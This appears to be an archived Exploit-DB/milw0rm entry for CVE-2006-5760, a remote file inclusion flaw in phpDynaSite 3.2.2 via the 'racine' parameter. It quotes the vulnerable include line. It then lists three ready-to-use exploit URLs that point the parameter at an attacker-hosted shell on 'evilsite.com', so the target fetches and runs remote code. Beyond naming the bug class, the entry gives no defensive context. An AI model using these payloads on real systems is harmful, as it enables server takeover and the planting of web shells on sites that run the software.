phpDynaSite <= 3.2.2 (racine) Remote File Include Vulnerabilities

EDB-ID: 2717	CVE: 2006-5760	OSVDB-ID: 30183
Author: DeltahackingTEAM	Published: 2006-11-04	Verified:
Exploit Code:	Vulnerable App: N/A

**********************************************************************************************************
                                                    WwW.Deltahacking.NeT
**********************************************************************************************************
* dynasite3.2.2
* Class = Remote File Inclusion ;
* Download = http://jaist.dl.sourceforge.net:80/sourceforge/phpdynasite/dynasite3.2.2.tar.gz
* Found by = Dr.Pantagon (rezayavari2006@yahoo.com)
-------------------------------------------------------------------------------------------------------------------
- Vulnerable Code
     include($racine."connection.php");
++++++++++++++++++++++++++++++++++++++++++++
- Exploit:
    http://[target]/[path]/function_log.php?racine=http://evilsite.com/shell?
    http://[target]/[path]/function_balise_url.php?racine=http://evilsite.com/shell?
    http://[target]/[path]/connection.php?racine=http://evilsite.com/shell?
------------------------------------------------------------------------------------------------------------------
Gr33tz:  Dr.Torojan
**************************************************************************************************************
# milw0rm.com [2006-11-04]

Comments

phpDynaSite <= 3.2.2 (racine) Remote File Include Vulnerabilities

Rating

No comments so far